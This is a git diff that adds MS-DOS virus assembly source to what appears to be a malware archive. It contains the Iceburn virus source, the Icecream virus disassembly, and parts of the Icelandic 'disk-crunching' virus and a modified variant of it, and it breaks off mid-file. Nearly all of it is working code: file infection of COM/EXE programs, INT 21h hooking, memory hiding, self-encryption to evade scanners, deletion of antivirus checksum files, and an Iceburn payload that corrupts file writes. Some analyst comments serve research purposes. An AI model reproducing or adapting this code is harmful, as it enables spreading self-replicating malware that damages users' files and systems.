'Z',00,00,VIRSIZ,0,0,0,0,0,0,0,0,0,0,0,0 +; +; The virus starts by pushing the original start address on the stack, +; so it can transfer control there when finished. +; +LABEL1: SUB SP,4 + PUSH BP + MOV BP,SP + PUSH AX + MOV AX,ES +; +; Put the the original CS on the stack. The ADD AX,data instruction +; is modified by the virus when it infects other programs. +; + DB 05H +ORG_CS DW 0010H + MOV [BP+4],AX +; +; Put the the original IP on the stack. This MOV [BP+2],data instruction +; is modified by the virus when it infects other programs. +; + DB 0C7H,46H,02H +ORG_IP DW 0000H +; +; Save all registers that are modified. +; + PUSH ES + PUSH DS + PUSH BX + PUSH CX + PUSH SI + PUSH DI +; +; Check if already installed. Quit if so. +; + XOR AX,AX + MOV ES,AX + CMP ES:[37FH],BYTE PTR 0FFH + JNE L1 +; +; Restore all registers and return to the original program. +; +EXIT: POP DI + POP SI + POP CX + POP BX + POP DS + POP ES + POP AX + POP BP + RET +; +; The code to check if INT 13 contains something other than +; 0070 or F000 has been removed. +; +; Set the installation flag, so infected programs run later will +; recognize the infection. +; +L1: MOV ES:[37FH],BYTE PTR 0FFH +; +; The virus tries to hide from detection by modifying the memory block it +; uses, so it seems to be a block that belongs to the operating system. +; +; It looks rather weird, but it seems to work. +; + MOV AH,52H + INT 21H +; +; The next line is new - the virus obtains the segment of the +; IBMDOS.COM/MSDOS.SYS program. +; + MOV CS:[DOSSEG],ES +; +; Back to modification +; + MOV AX,ES:[BX-2] + MOV ES,AX + ADD AX,ES:[0003] + INC AX + INC AX + MOV CS:[0001],AX +; +; Next, the virus modifies the memory block of the infected program. +; It is made smaller, and no longer the last block. +; + MOV BX,DS + DEC BX + MOV DS,BX + MOV AL,'M' + MOV DS:[0000],AL + MOV AX,DS:[0003] + SUB AX,VIRSIZ + MOV DS:[0003],AX + ADD BX,AX + INC BX +; +; Then the virus moves itself to the new block. For some reason 2000 +; bytes are transferred, when much less would be enough. Maybe the author just +; wanted to leave room for future expansions. +; + MOV ES,BX + XOR SI,SI + XOR DI,DI + PUSH CS + POP DS + MOV CX,2000 + CLD + REP MOVSB +; +; The virus then transfers control to the new copy of itself. +; + PUSH ES + MOV AX,OFFSET L2 + PUSH AX + RET +; +; This part of the program is new. It tries to bypass protection +; programs, by obtaining the original INT 21 address. It searches +; for the byte sequence 2E 3A 26, which (in DOS 3.1 and 3.3) is the +; beginning of the original interrupt (probably also in 3.2 - I do +; not have a copy of that) +; +L2: MOV DS,CS:[DOSSEG] + MOV CX,3000H + MOV SI,0 + MOV AX,3A2EH +L3: CMP AX,[SI] + JE L3A +L3C: INC SI + LOOP L3 +; +; If that fails, it searches for 80 FC 63 (used in 3.0) +; 80 FC 4B (used in 2.0) +; 80 FC F8 (This looks very odd - +; I have no idea what DOS version this might be.) +; + MOV CX,3000H + MOV SI,0 + MOV AX,0FC80H +L3D: CMP AX,[SI] + JE L3F +L3E: INC SI + LOOP L3D +; +; Start of DOS not found - Give up (but remain in memory) +; + JMP EXIT + +L3A: CMP BYTE PTR[SI+2],26H + JE L3B + JMP L3C +L3F: CMP BYTE PTR[SI+2],63H + JE L3B + CMP BYTE PTR[SI+2],4BH + JE L3B + CMP BYTE PTR[SI+2],0F8H + JE L3B + JMP L3E +L3B: MOV CS:[DOSPC],SI +; +; The main program modifies INT 21 next and finally returns to the +; original program. The original INT 21 vector is stored inside the +; program so a JMP [OLD INT21] instruction can be used. +; + XOR AX,AX + MOV ES,AX + MOV AX,ES:[0084H] + MOV CS:[OLD21],AX + MOV AX,ES:[0086H] + MOV CS:[OLD21+2],AX + MOV AX,CS + MOV ES:[0086H],AX + MOV AX,OFFSET NEW21 + MOV ES:[0084H],AX + JMP EXIT +VIRUS ENDP +; +; This is the INT 21 replacement. It only does something in the case +; of an EXEC call. +; +NEW21 PROC FAR + CMP AH,4BH + JE L5 +L4: DB 0EAH +OLD21 DW 0,0 +; +; Only attack every tenth program run. +; +L5: DEC CS:[COUNTER] + JNE L4 + MOV CS:[COUNTER],10 +; +; Save all affected registers. +; + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DS +; +; Search for the file name extension ... +; + MOV BX,DX +L6: INC BX + CMP BYTE PTR [BX],'.' + JE L8 + CMP BYTE PTR [BX],0 + JNE L6 +; +; ... and quit unless it starts with "EX". +; +L7: POP DS + POP SI + POP DX + POP CX + POP BX + POP AX + JMP L4 +L8: INC BX + CMP WORD PTR [BX],5845H + JNE L7 +; +; When an .EXE file is found, the virus starts by turning off +; the read-only attribute. The read-only attribute is not restored +; when the file has been infected. +; +; Here, as elsewhere, the INT 21 instructions have been replaced +; by PUSHF/CALL DWORD PTR CS:[DOSPC] +; + MOV AX,4300H ; Get attribute + PUSHF + CALL DWORD PTR CS:[DOSPC] + JC L7 + MOV AX,4301H ; Set attribute + AND CX,0FEH + PUSHF + CALL DWORD PTR CS:[DOSPC] + JC L7 +; +; Next, the file is examined to see if it is already infected. +; The signature (4418 5F19) is stored in the last two words. +; + MOV AX,3D02H ; Open / write access + PUSHF + CALL DWORD PTR CS:[DOSPC] + JC L7 + MOV BX,AX ; file handle in BX + PUSH CS ; now DS is no longer needed + POP DS +; +; The header of the file is read in at [ID+8]. The virus then +; modifies itself, according to the information stored in the +; header. (The original CS and IP addressed are stored). +; + MOV DX,OFFSET ID+8 + MOV CX,1CH + MOV AH,3FH + PUSHF + CALL DWORD PTR CS:[DOSPC] + JC L9 + MOV AX,DS:ID[1CH] + MOV DS:[ORG_IP],AX + MOV AX,DS:ID[1EH] + ADD AX,10H + MOV DS:[ORG_CS],AX +; +; Next the read/write pointer is moved to the end of the file-4, +; and the last 4 bytes read. They are compared to the signature, +; and if equal nothing happens. +; + MOV AX,4202H + MOV CX,-1 + MOV DX,-4 + PUSHF + CALL DWORD PTR CS:[DOSPC] + JC L9 + ADD AX,4 + MOV DS:[LEN_LO],AX + JNC L8A + INC DX +L8A: MOV DS:[LEN_HI],DX + + MOV AH,3FH + MOV CX,4 + MOV DX,OFFSET ID+4 + PUSHF + CALL DWORD PTR CS:[DOSPC] + JNC L11 +L9: MOV AH,3EH + PUSHF + CALL DWORD PTR CS:[DOSPC] +L10: JMP L7 +; +; Compare to 4418,5F19 +; +L11: MOV SI,OFFSET ID+4 + MOV AX,[SI] + CMP AX,4418H + JNE L12 + MOV AX,[SI+2] + CMP AX,5F19H + JE L9 +; +; The file is not infected, so the next thing the virus does is +; infecting it. First it is padded so the length becomes a multiple +; of 16 bytes. This is probably done so the virus code can start at a +; paragraph boundary. +; +L12: MOV AX,DS:[LEN_LO] + AND AX,0FH + JZ L13 + MOV CX,16 + SUB CX,AX + ADD DS:[LEN_LO],CX + JNC L12A + INC DS:[LEN_HI] +L12A: MOV AH,40H + PUSHF + CALL DWORD PTR CS:[DOSPC] + JC L9 +; +; Next the main body of the virus is written to the end. +; +L13: XOR DX,DX + MOV CX,OFFSET ID + 4 + MOV AH,40H + PUSHF + CALL DWORD PTR CS:[DOSPC] + JC L9 +; +; Next the .EXE file header is modified: +; +; First modify initial IP +; + MOV AX,OFFSET LABEL1 + MOV DS:ID[1CH],AX +; +; Modify starting CS = Virus CS. It is computed as: +; +; (Original length of file+padding)/16 - Start of load module +; + MOV DX,DS:[LEN_HI] + MOV AX,DS:[LEN_LO] + SHR DX,1 + RCR AX,1 + SHR DX,1 + RCR AX,1 + SHR DX,1 + RCR AX,1 + SHR DX,1 + RCR AX,1 + SUB AX,DS:ID[10H] + MOV DS:ID[1EH],AX +; +; Modify length mod 512 +; + ADD DS:[LEN_LO],OFFSET ID+4 + JNC L14 + INC DS:[LEN_HI] +L14: MOV AX,DS:[LEN_LO] + AND AX,511 + MOV DS:ID[0AH],AX +; +; Modify number of blocks used +; + MOV DX,DS:[LEN_HI] + MOV AX,DS:[LEN_LO] + ADD AX,511 + JNC L14A + INC DX +L14A: MOV AL,AH + MOV AH,DL + SHR AX,1 + MOV DS:ID[0CH],AX +; +; Finally the modified header is written back to the start of the +; file. +; +QQQ: MOV AX,4200H + XOR CX,CX + XOR DX,DX + PUSHF + CALL DWORD PTR CS:[DOSPC] + JC ENDIT + MOV AH,40H + MOV DX,OFFSET ID+8 + MOV CX,1CH + PUSHF + CALL DWORD PTR CS:[DOSPC] + JC ENDIT + MOV AH,3EH + PUSHF + CALL DWORD PTR CS:[DOSPC] +; +; Infection is finished - close the file and execute it. +; +ENDIT: JMP L9 +; +; The damage section located here has been removed. +; + +NEW21 ENDP + +DOSPC DW ? + +DOSSEG DW ? +COUNTER DB 10 +LEN_LO DW ? +LEN_HI DW ? +ID DW 4418H,5F19H ; The signature of the virus. +; +; A buffer, used for data from the file. +; +_TEXT ENDS + + END LABEL1 + + diff --git a/MSDOS/Virus.MSDOS.Unknown.iceburn.asm b/MSDOS/Virus.MSDOS.Unknown.iceburn.asm new file mode 100644 index 00000000..eeb08b2a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.iceburn.asm @@ -0,0 +1,404 @@ + +; - +; Iceburn - (c)1995 irogen - Using iCE v0.2 +; - +; +; Infects COM and EXE when executed. +; COM Infection marker: fourth byte is 0 +; EXE infection marker: Checksum in header not equal to 0. +; Time/Date do not change +; Read-only and hidden files will be infected, and attributes restored. +; Virus installs its own critical error handler +; Deletes MSAV/CPAV CHecksum filez.. +; Activates on the second of any month, at which time it will phuck +; up all file writes using INT 21h/func 40h. +; Does not use ViCE anti-tbscan. Has a second cryptor to thwart many +; TBSCAN flags. +; + + +cseg segment + assume cs:cseg, ds:cseg, es:cseg, ss:cseg + +signal equ 0FA01h ; AX=signal/INT 21h/installation chk +vsafe_word equ 5945h ; magic word for VSAFE/VWATCH API +special equ 11h +act_day equ 2 +buf_size equ 170 +vice_size equ 1587+buf_size +virus_size equ (offset vend-offset start)+VICE_SIZE +extrn _vice:near + +org 0h +start: + + push ds es + inc si + mov ax,1000h ; looks like legit. INT call.. + add ax,signal-1000h ; are we memory resident? + mov dx,vsafe_word + mov bl,special + int 21h + call nx ; get relative offset + nx: pop bp + sub bp,offset nx + or si,si + jz no_install ; if carry then we are + + call crypt ; decrypt the next few bytez +c_start: + mov cs:activate[bp],0 + mov ah,2ah ; get date + int 21h + cmp dl,act_day ; + jnz no_act + mov cs:activate[bp],1 +no_act: + + mov ax,ds ; PSP segment + dec ax ; mcb below PSP m0n + mov ds,ax ; DS=MCB seg + cmp byte ptr ds: [0],'Z' ; Is this the last MCB in chain? + jnz no_install + sub word ptr ds: [3],((virus_size+1023)/1024)*64*2 ; alloc MCB + sub word ptr ds: [12h],((virus_size+1023)/1024)*64*2 ; alloc PSP + mov es,word ptr ds: [12h] ; get high mem seg + push cs + pop ds + mov si,bp + mov cx,virus_size/2+1 + xor di,di + rep movsw ; copy code to new seg + xor ax,ax + mov ds,ax ; null ds + push ds + lds ax,ds: [21h*4] ; get 21h vector + mov es: word ptr old21+2,ds ; save S:O + mov es: word ptr old21,ax + pop ds + mov ds: [21h*4+2],es ; new int 21h seg + mov ds: [21h*4],offset new21 ; new offset + sub byte ptr ds: [413h],((virus_size+1023)*2)/1024;-totalmem +c_end: +no_install: + + pop es ds ; restore ES DS + cmp cs:is_exe[bp],1 + jz exe_return + + lea si,org_bytes[bp] ; com return + mov di,0100h ; -restore first 4 bytes + mov cx,2 + rep movsw + + mov ax,100h ; jump back to 100h + push ax +_ret:ret + + exe_return: + mov cx,ds ; calc. real CS + add cx,10h + add word ptr cs:[exe_jump+2+bp],cx + int 3 ; fix prefetch + db 0eah +exe_jump dd 0 +is_exe db 0 + +; +; Crypts portion of virus +; +crypt_res: + xor bp,bp +crypt: + lea si,c_start + add si,bp + mov cx,(offset c_end-offset c_start) + add byte ptr cs:xor_op[bp],10h ; self modifying code... + int 3 ; fix prefetch +l1: + db 2Eh +xor_op db 70h,34h ; tbscan won't flag this bitch +xor_val db 0 + inc si + loop l1 + sub byte ptr cs:xor_op[bp],10h ; unmodify code + ret + +; +; Infection routine - called from INT 21h handler. +; DS:DX=fname +; + +infect_file: + + push dx + pop si + + push ds + xor ax,ax ; null ES + mov es,ax + lds ax,es:[24h*4] ; get INT 24h vector + mov cs:old_24_off,ax ; save it + mov cs:old_24_seg,ds + mov es:[24h*4+2],cs ; install our handler + mov es:[24h*4],offset new_24 + pop ds + push es ; we'll need it later + push cs + pop es + + mov ax,4300h ; get phile attribute + int 21h + mov ax,4301h ; null attribs + push ax cx ; save AX-call/CX-attrib + xor cx,cx + int 21h + + mov ax,3d02h ; open the file + int 21h + jc dont_do + + mov bx,ax ; get handle + + push cs + pop ds + + call kill_chklst ; kill MSAV and CPAV checksum files + + mov ah,3fh ; Read first bytes of file + mov cx,20h + lea dx,org_bytes + int 21h + + cmp byte ptr org_bytes,'M' ; single byte avoids heuristic flag + jz do_exe + cmp byte ptr org_bytes+3,0 + jz close + + mov is_exe,0 + + mov ax,5700h ; get time/date + int 21h + push cx dx + + call offset_end + push ax ; AX=end of file + + lea si,start ; DS:SI=start of code to encrypt + mov di,virus_size ; ES:DI=address for decryptor/ + push di ; encrypted code. (at heap) + mov cx,virus_size ; CX=virus size + mov dx,ax ; DX=EOF offset + add dx,100h ; DX=offset decryptor will run from + mov al,00001011b ; jmps,no anti-tbscan, garbage, no CS: + call _vice ; call engine! + + pop dx + mov ah,40h + int 21h + + call offset_zero + pop ax ; restore COM file size + sub ax,3 ; calculate jmp offset + mov word ptr new_jmp+1,ax + + lea dx,new_jmp + mov cx,4 + mov ah,40h + int 21h + + pop dx cx ; pop date/time + mov ax,5701h ; restore the mother fuckers + int 21h + + close: + + pop cx ax ; restore attrib + int 21h + + mov ah,3eh + int 21h + + dont_do: + pop es ; ES=0 + lds ax,dword ptr old_24_off ; restore shitty DOS error handler + mov es:[24h*4],ax + mov es:[24h*4+2],ds + + ret + + do_exe: + + cmp word ptr exe_header[12h],0 ; is checksum (in hdr) 0? + jnz close + cmp byte ptr exe_header[18h],52h ; pklite'd? + jz exe_ok + cmp byte ptr exe_header[18h],40h ; don't infect new format exe + jge close +exe_ok: + push bx + + mov ah,2ch ; grab a random number + int 21h + mov word ptr exe_header[12h],dx ; mark that it's us + mov is_exe,1 + + les ax,dword ptr exe_header+14h ; Save old entry point + mov word ptr ds:exe_jump, ax + mov word ptr ds:exe_jump+2, es + + push cs + pop es + + call offset_end + + push dx ax ; save file size DX:AX + + mov bx, word ptr exe_header+8h ; calc. new entry point + mov cl,4 ; *16 + shl bx,cl ; ^by shifting one byte + sub ax,bx ; get actual file size-header + sbb dx,0 + mov cx,10h ; divide AX/CX rDX + div cx + + mov word ptr exe_header+14h,dx + mov word ptr exe_header+16h,ax + mov rel_off,dx + + pop ax ; AX:DX file size + pop dx + pop bx + + mov cx,virus_size+10h ; calc. new size + adc ax,cx + + mov cl,9 ; calc new alloc (512) + push ax + shr ax,cl + ror dx,cl + stc + adc dx,ax + pop ax ; ax=size+virus + and ah,1 + + mov word ptr exe_header+4h,dx + mov word ptr exe_header+2h,ax + + lea si,start ; DS:SI=start of code to encrypt + mov di,virus_size ; ES:DI=address for decryptor and + push di ; encrypted code (at heap) + mov cx,virus_size ; CX=virus size + mov dx,rel_off ; DX=offset decryptor will run from + mov al,00001010b ; jmps,no anti-tbscan,garbage, use CS: + call _vice ; call engine! + + pop dx + mov ah,40h + int 21h + + call offset_zero + + mov cx,18h ; write fiXed header + lea dx,exe_header + mov ah,40h + int 21h + + jmp close + +; +; set file ptr + +offset_zero: ; self explanitory + xor al,al + jmp set_fp +offset_end: + mov al,02h + set_fp: + mov ah,42h + xor cx,cx + xor dx,dx + int 21h + ret + +; +; Kill those darned MSAV and CPAV filez.. +; +kill_chklst: + mov di,2 ; counter for loop + lea dx,first_2die ; first fname to kill +kill_loop: + mov ax,4301h ; reset attribs + xor cx,cx + int 21h + mov ah,41h ; delete phile + int 21h + lea dx,last_2die ; second fname to kill + dec di + jnz kill_loop + + ret +first_2die db 'CHKLIST.MS',0 ; MSAV shitty checksum +last_2die db 'CHKLIST.CPS',0 ; CPAV shitty checksum + +; +; new 21h + +new21: + + pushf + cmp ax,signal ; be it us? + jnz not_us ; richtig.. + cmp dx,vsafe_word + jnz not_us + cmp bl,special + jnz not_us + xor si,si + mov di,4559h + jmp jmp_org +not_us: + cmp cs:activate,0 ; time to activate? + jz nchk + cmp ah,40h ; write to phile? + jnz jmp_org + xor dx,dx ; phuck up address.. +nchk: cmp ax,4b00h ; execute phile? + jnz jmp_org + + push ax bx cx di dx si ds es bp dx + mov ah,2ch ; grab random for cryptor + int 21h + mov byte ptr cs:xor_val,dl + pop dx + call crypt_res + call infect_file + call crypt_res + pop bp es ds si dx di cx bx ax + + jmp_org: + popf + db 0eah ; jump far XXXX:XXXX + old21 dd 0 + + +new_24: ; critical error handler + mov al,3 ; prompts suck, return fail + iret + + +activate db 0 +txt_ptr dw offset credits +credits db '[IceBurn, by irogen]' +credit_end: +new_jmp db 0E9h,0,0,0 ; jmp XXXX,0 +rel_off dw 0 +exe_header: +org_bytes db 0CDh,20h,0,0 ; original COM bytes | exe hdr +heap: +db 16h dup(0) ; remaining exe header space +old_24_off dw 0 ; old int24h vector +old_24_seg dw 0 +vend: +cseg ends + end start + diff --git a/MSDOS/Virus.MSDOS.Unknown.icecream.asm b/MSDOS/Virus.MSDOS.Unknown.icecream.asm new file mode 100644 index 00000000..28e746d5 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.icecream.asm @@ -0,0 +1,259 @@ +;Icecream Virus by the TridenT virus research group. + +;This is a simple direct-action com virus that uses one of +;4 encryption algorithms to encrypt itself each time it infects a file. +;It will infect one .COM file in the current directory every time it is +;executed. It marks infections with the time stamp. + + +;Disassembly by Black Wolf + +.model tiny +.code + org 100h + +start: + db 0e9h,0ch,0 ;jmp Virus_Entry + +Author_Name db 'John Tardy' + + db 0E2h,0FAh +Virus_Entry: + push ax + call Get_Offset +Get_Offset: + pop ax + sub ax,offset Get_Offset + + db 89h,0c5h ;mov bp,ax + lea si,[bp+Storage] + mov di,100h ;Restore file + movsw + movsb + + mov ah,1Ah + mov dx,0f900h + int 21h ;Set DTA + + mov ah,4Eh + +FindFirstNext: + lea dx,[bp+ComMask] + xor cx,cx + int 21h ;Find File + jnc InfectFile + +Restore_DTA: + mov ah,1Ah + mov dx,80h + int 21h ;Set DTA to default + + mov bx,offset start + pop ax ;Return to host + push bx + retn + +InfectFile: + mov ax,4300h + mov dx,0f91eh + int 21h ;Get file attribs + + push cx ;save 'em + mov ax,4301h + xor cx,cx + int 21h ;Set them to 0 + + mov ax,3D02h + int 21h ;Open file + + mov bx,5700h + xchg ax,bx + int 21h ;Get file time + + push cx + push dx ;save it + and cx,1Fh + cmp cx,1 ;check for infection + jne ContinueInfection + db 0e9h,69h,0 ;jmp DoneInfect + +ContinueInfection: + mov ah,3Fh + lea dx,[bp+Storage] + mov cx,3 + int 21h ;Read in first 3 bytes + + mov ax,cs:[Storage+bp] + cmp ax,4D5Ah ;Is it an EXE? + je DoneInfect + cmp ax,5A4Dh + je DoneInfect ;Other EXE signature? + + pop dx + pop cx + and cx,0FFE0h ;Change stored time values + or cx,1 ;to mark infection + push cx + push dx + + mov ax,4202h ;Go to the end of the file + call Move_FP + sub ax,3 + mov cs:[JumpSize+bp],ax ;Save jump size + + add ax,10Fh ;Save encryption starting + mov word ptr [bp+EncPtr1+1],ax ;point.... + mov word ptr [bp+EncPtr2+1],ax + mov word ptr [bp+EncPtr3+1],ax + mov word ptr [bp+EncPtr4+1],ax + call SetupEncryption ;Encrypt virus + + mov ah,40h + mov dx,0fa00h + mov cx,1F5h + int 21h ;Write virus to file + + mov ax,4200h + call Move_FP ;Go to the beginning of file + + mov ah,40h + lea dx,[bp+JumpBytes] + mov cx,3 + int 21h ;Write in jump + + call FinishFile + jmp Restore_DTA + +DoneInfect: + call FinishFile + mov ah,4Fh + jmp FindFirstNext + +Move_FP: + xor cx,cx + xor dx,dx + int 21h + ret + +FinishFile: + pop si dx cx + mov ax,5701h ;Reset file time/date stamp + int 21h ;(or mark infection) + + mov ah,3Eh + int 21h ;Close new host file + + mov ax,4301h + pop cx + mov dx,0fc1eh + int 21h ;Restore old attributes + + push si + retn + +Message db ' I scream, you scream, we both ' + db 'scream for an ice-cream! ' + +SetupEncryption: + xor byte ptr [bp+10Dh],2 + xor ax,ax + mov es,ax + mov ax,es:[46ch] ;Get random number + push cs + pop es + push ax + and ax,7FFh + add ax,1E9h + mov word ptr [bp+EncSize1+1],ax + mov word ptr [bp+EncSize2+1],ax + mov word ptr [bp+EncSize3+1],ax + mov word ptr [bp+EncSize4+1],ax + pop ax + push ax + and ax,3 + shl ax,1 + mov si,ax + mov ax,[bp+si+EncData1] + add ax,bp + mov si,ax + lea di,[bp+103h] + movsw + movsw + movsw + movsw ;Copy Encryption Algorithm + pop ax + stosb + movsb + mov dl,al + lea si,[bp+103h] + mov di,0fa00h + mov cx,0Ch + rep movsb + lea si,[bp+10Fh] + mov cx,1E9h + +EncryptVirus: + lodsb + db 30h,0d0h ;xor al,dl + stosb + loop EncryptVirus + + cmp dl,0 + je KeyWasZero + retn + +KeyWasZero: ;If key is zero, increase + mov si,offset AuthorName ;jump size and place name + mov di,0fa00h ;at beginning.... + mov cx,0Ah + rep movsb + mov ax,cs:[JumpSize+bp] + add ax,0Ch + mov cs:[JumpSize+bp],ax + retn + + db '[TridenT]' + +EncData1 dw 02beh +EncData2 dw 02c7h +EncData3 dw 02d0h +EncData4 dw 02d9h + +Encryptions: +;------------------------------------------------------------ +EncPtr1: + mov si,0 +EncSize1: + mov cx,0 + xor byte ptr [si],46h +;------------------------------------------------------------ +EncPtr2: + mov di,0 +EncSize2: + mov cx,0 + xor byte ptr [di],47h +;------------------------------------------------------------ +EncSize3: + mov cx,0 +EncPtr3: + mov si,0 + xor byte ptr [si],46h +;------------------------------------------------------------ +EncSize4: + mov cx,0 +EncPtr4: + mov di,0 + xor byte ptr [di],47h +;------------------------------------------------------------ + +AuthorName db 'John Tardy' + +JumpBytes db 0E9h +JumpSize dw 0 + +ComMask db '*.CoM',0 + +Storage dw 20CDh + db 21h + +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.icelandi.asm b/MSDOS/Virus.MSDOS.Unknown.icelandi.asm new file mode 100644 index 00000000..8a20368e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.icelandi.asm @@ -0,0 +1,554 @@ + +; THE ICELANDIC "DISK-CRUNCHING" VIRUS +; +; Another possible name for this virus might be "One-in-ten", since +; it tries to infect every tenth program run. The Icelandic name for +; this virus ("Diskaetuvirus") translates to "Disk-eating virus" +; +; It was first located at one site in mid-June '89. It has since then +; been found at a few other places, but is quite rare yet. So far it +; does not seem to have spread to any other country. +; +; Disassembly done in June/July '89. +; +; The author of this program is unknown, but it appears to be of +; Icelandic origin. +; +; All comments in this file were added by Fridrik Skulason, +; University of Iceland/Computing Services. +; +; INTERNET: frisk@rhi.hi.is +; UUCP: ...mcvax!hafro!rhi!frisk +; BIX: FRISK +; +; To anyone who obtains this file - please be careful with it, I +; would not like to see this virus be distributed too much. The code +; is very clear, and the virus is quite well written. It would be VERY +; easy to modify it to do something really harmful. +; +; A short description of the virus: +; +; It only infects .EXE files. Infected files grow by 656 to 671 +; bytes, and the length of the infected file MOD 16 will always be 0. +; The virus attaches itself to the end of the programs it infects. +; +; When an infected file is run, the virus copies itself to top of +; free memory, and modifies the memory blocks, in order to hide from +; memory mapping programs. Some programs may overwrite this area, +; causing the computer to crash. +; +; The virus does nothing if some other program has hooked INT 13 +; before it is run. This is probably done to avoid detection by +; protection programs, but it also means that many ordinary +; programs like SideKick and disk cache software will disable it. +; Even the PRINT command will disable the virus. This reduces the +; spread of the virus, but also greatly reduces the possibility that +; the virus will be detected. +; +; The virus will hook INT 21H and when function 4B (EXEC) is called +; it sometimes will infect the program being run. It will check every +; tenth program that is run for infection, and if it is not already +; infected, it will be. +; +; The virus will remove the Read-Only attribute before trying to +; infect programs. +; +; Infected files can be easily recognized, since they always end in +; 4418,5F19. +; +; To check for system infection, a byte at 0:37F is used - if it +; contains FF the virus is installed in memory. +; +; This virus is slightly harmful, but does no serious damage. +; On floppy-only, or machines with 10Mbyte hard disks it will do +; no damage at all, but on machines with larger hard disks it will +; select one unused entry in the FAT table, and mark it as bad, when it +; infects a file. Since the virus only modifies the first copy of the +; FAT, a quick fix is simply to copy the second table over the first. +; This is the only "mistake" I have found in this virus. It appears +; to be very well written - What a shame the programmer did not use +; his abilities for something more constructive. +; +; This file was created in the following way: I wrote a small program, +; that did nothing but write "Hello world!" and ran it several times, +; until it became infected. I then diassembled the program, changed +; it into an .ASM file, and worked on it until this file, when +; assembled, produced the same file as the original infected one. +; +; (Or almost the same - the checksum in the header is different). +; +VIRSIZ EQU 128 + + ASSUME CS:_TEXT,DS:_TEXT,SS:NOTHING,ES:NOTHING +; +; This is the original program. +; +_TEXT1 SEGMENT PARA PUBLIC 'CODE' +_START DB 0b4H,09H + PUSH CS + POP DS + MOV DX,OFFSET STRING + INT 21H + MOV AX,4C00H + INT 21H +STRING DB "Hello world!",0dh,0ah,"$" + _TEXT1 ENDS + +_TEXT SEGMENT PARA PUBLIC 'CODE' + +; +; The virus is basically divided in three parts. +; +; 1. The main program - run when an infected program is run. +; It will check if the system is already infected, and if not +; it will install the virus. +; +; 2. The new INT 21 handler. It will look for EXEC calls, and +; (sometimes) infect the program being run. +; +; 3. The damage routine. It will select one unused cluster and mark it +; as bad. +; +VIRUS PROC FAR +; +; This is a fake MCB +; + DB 'Z',00,00,VIRSIZ,0,0,0,0,0,0,0,0,0,0,0,0 +; +; The virus starts by pushing the original start address on the stack, +; so it can transfer control there when finished. +; +LABIA: SUB SP,4 + PUSH BP + MOV BP,SP + PUSH AX + MOV AX,ES +; +; Put the the original CS on the stack. The ADD AX,data instruction +; is modified by the virus when it infects other programs. +; + DB 05H +ORG_CS DW 0010H + MOV [BP+4],AX +; +; Put the the original IP on the stack. This MOV [BP+2],data instruction +; is modified by the virus when it infects other programs. +; + DB 0C7H,46H,02H +ORG_IP DW 0000H +; +; Save all registers that are modified. +; + PUSH ES + PUSH DS + PUSH BX + PUSH CX + PUSH SI + PUSH DI +; +; Check if already installed. Quit if so. +; + XOR AX,AX + MOV ES,AX + CMP ES:[37FH],BYTE PTR 0FFH + JNE L1 +; +; Restore all registers and return to the original program. +; +EXIT: POP DI + POP SI + POP CX + POP BX + POP DS + POP ES + POP AX + POP BP + RET +; +; Check if INT 13 is 0070:xxxx or F000:xxxx. If not, assume some +; program is monitoring int 13, and quit. +; +L1: MOV AX,ES:[4EH] + CMP AX,0070H + JE L2 + CMP AX,0F000H + JNE EXIT +; +; Set the installation flag, so infected programs run later will +; recognize the infection. +; +L2: MOV ES:[37FH],BYTE PTR 0FFH +; +; The virus tries to hide from detection by modifying the memory block it +; uses, so it seems to be a block that belongs to the operating system. +; +; It looks rather weird, but it seems to work. +; + MOV AH,52H + INT 21H + MOV AX,ES:[BX-2] + MOV ES,AX + ADD AX,ES:[0003] + INC AX + INC AX + MOV CS:[0001],AX +; +; Next, the virus modifies the memory block of the infected program. +; It is made smaller, and no longer the last block. +; + MOV BX,DS + DEC BX + MOV DS,BX + MOV AL,'M' + MOV DS:[0000],AL + MOV AX,DS:[0003] + SUB AX,VIRSIZ + MOV DS:[0003],AX + ADD BX,AX + INC BX +; +; Then the virus moves itself to the new block. For some reason 2000 +; bytes are transferred, when 651 would be enough. Maybe the author just +; wanted to leave room for future expansions. +; + MOV ES,BX + XOR SI,SI + XOR DI,DI + PUSH CS + POP DS + MOV CX,2000 + CLD + REP MOVSB +; +; The virus then transfers control to the new copy of itself. +; + PUSH ES + MOV AX,OFFSET L3 + PUSH AX + RET +; +; The main program modifies INT 21 next and finally returns to the +; original program. The original INT 21 vector is stored inside the +; program so a JMP [OLD INT21] instruction can be used. +; +L3: XOR AX,AX + MOV ES,AX + MOV AX,ES:[0084H] + MOV CS:[OLD21],AX + MOV AX,ES:[0086H] + MOV CS:[OLD21+2],AX + MOV AX,CS + MOV ES:[0086H],AX + MOV AX,OFFSET NEW21 + MOV ES:[0084H],AX + JMP EXIT +VIRUS ENDP +; +; This is the INT 21 replacement. It only does something in the case +; of an EXEC call. +; +NEW21 PROC FAR + CMP AH,4BH + JE L5 +L4: DB 0EAH +OLD21 DW 0,0 +; +; Only attack every tenth program run. +; +L5: DEC CS:[COUNTER] + JNE L4 + MOV CS:[COUNTER],10 +; +; Save all affected registers. +; + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DS +; +; Search for the file name extension ... +; + MOV BX,DX +L6: INC BX + CMP BYTE PTR [BX],'.' + JE L8 + CMP BYTE PTR [BX],0 + JNE L6 +; +; ... and quit unless it starts with "EX". +; +L7: POP DS + POP SI + POP DX + POP CX + POP BX + POP AX + JMP L4 +L8: INC BX + CMP WORD PTR [BX],5845H + JNE L7 +; +; When an .EXE file is found, the virus starts by turning off +; the read-only attribute. The read-only attribute is not restored +; when the file has been infected. +; + MOV AX,4300H ; Get attribute + INT 21H + JC L7 + MOV AX,4301H ; Set attribute + AND CX,0FEH + INT 21H + JC L7 +; +; Next, the file is examined to see if it is already infected. +; The signature (4418 5F19) is stored in the last two words. +; + MOV AX,3D02H ; Open / write access + INT 21H + JC L7 + MOV BX,AX ; file handle in BX + PUSH CS ; now DS is no longer needed + POP DS +; +; The header of the file is read in at [ID+8]. The virus then +; modifies itself, according to the information stored in the +; header. (The original CS and IP addressed are stored). +; + MOV DX,OFFSET ID+8 + MOV CX,1CH + MOV AH,3FH + INT 21H + JC L9 + MOV AX,DS:ID[1CH] + MOV DS:[ORG_IP],AX + MOV AX,DS:ID[1EH] + ADD AX,10H + MOV DS:[ORG_CS],AX +; +; 